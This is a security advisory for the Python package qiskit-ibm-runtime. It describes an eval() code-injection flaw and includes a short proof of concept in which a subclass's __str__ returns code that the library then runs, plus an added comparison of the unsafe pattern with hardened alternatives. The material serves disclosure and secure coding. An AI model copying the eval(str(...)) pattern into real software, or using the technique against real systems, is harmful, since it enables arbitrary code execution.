GHSA-cq96-9974-v8hm – qiskit-ibm-runtime
Package
Manager: pip
Name: qiskit-ibm-runtime
Vulnerable Version: >=0.11.0 <0.11.1
Severity
Level: Low
CVSS v3.1: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N
CVSS v4.0: CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
EPSS: N/A (percentile: N/A)
Details
Dynamic Variable Evaluation in qiskit-ibm-runtime

### Summary

An `eval()` call exists in `Options._get_program_inputs`. This is bad in any case, but especially bad because `Options` are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.

### Details

https://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140

### PoC

A local exploit would be something like

```python
from qiskit import transpiler


class BadActor(transpiler.CouplingMap):
    # The string form of the object is what ends up being evaluated.
    def __str__(self):
        return "print('external code')"
```

Where `print("external code")` can be any arbitrary Python code string. Then if you did a normal workflow and used a specifically constructed `CouplingMap` subclass like `BadActor` above:

```python
from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler
from qiskit import QuantumCircuit

cmap = BadActor.from_line(42)
service = QiskitRuntimeService()

options = Options(optimization_level=1)
# The crafted coupling map is passed in through the simulator options.
options.simulator = dict(coupling_map=cmap)

bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()

with Session(service=service, backend="ibmq_qasm_simulator") as session:
    sampler = Sampler(session=session, options=options).run(bell)
```

This will print `external code`.

### Impact

Security vulnerability.
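The pattern behind this advisory next to two hardened alternatives, as an added example that is not the project's code or its actual fix. `EdgeMap`, `OverriddenStr` and the three serializer functions are hypothetical stand-ins (no Qiskit import), and the example assumes the vulnerable path evaluates `str(coupling_map)`, as the PoC's `__str__` override implies.

```python
import ast

executed = []  # constructed marker: records whether object text was run as code


class EdgeMap:
    """Hypothetical stand-in for a coupling map: a list of qubit edges."""

    def __init__(self, edges):
        self._edges = [tuple(e) for e in edges]

    def get_edges(self):
        return list(self._edges)

    def __str__(self):
        return str([list(e) for e in self._edges])


class OverriddenStr(EdgeMap):
    # Mirrors the advisory's BadActor: __str__ returns code instead of data.
    def __str__(self):
        return "executed.append('external code')"


def serialize_unsafe(cmap):
    # Vulnerable pattern: the string form of an object is evaluated as Python.
    return eval(str(cmap))


def serialize_from_api(cmap):
    # Hardened: never round-trip through text; read the edges and validate them.
    edges = []
    for edge in cmap.get_edges():
        if len(edge) != 2 or not all(type(q) is int and q >= 0 for q in edge):
            raise ValueError(f"invalid edge: {edge!r}")
        edges.append([edge[0], edge[1]])
    return edges


def serialize_literal(cmap):
    # Fallback when only text is available: literal_eval accepts literals only
    # and raises ValueError on calls, names or attribute access.
    value = ast.literal_eval(str(cmap))
    if not isinstance(value, list):
        raise ValueError("expected a list of edges")
    return value
```

Reading structured data from the object is the stronger of the two options, because it does not depend on what a subclass chooses to return from `__str__`.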
Metadata
Created: 2024-03-20T15:41:26Z
Modified: 2024-03-20T15:41:27Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-cq96-9974-v8hm/GHSA-cq96-9974-v8hm.json
CWE IDs: ["CWE-627"]
Alternative ID: N/A
Finding: F020
Auto approve: 1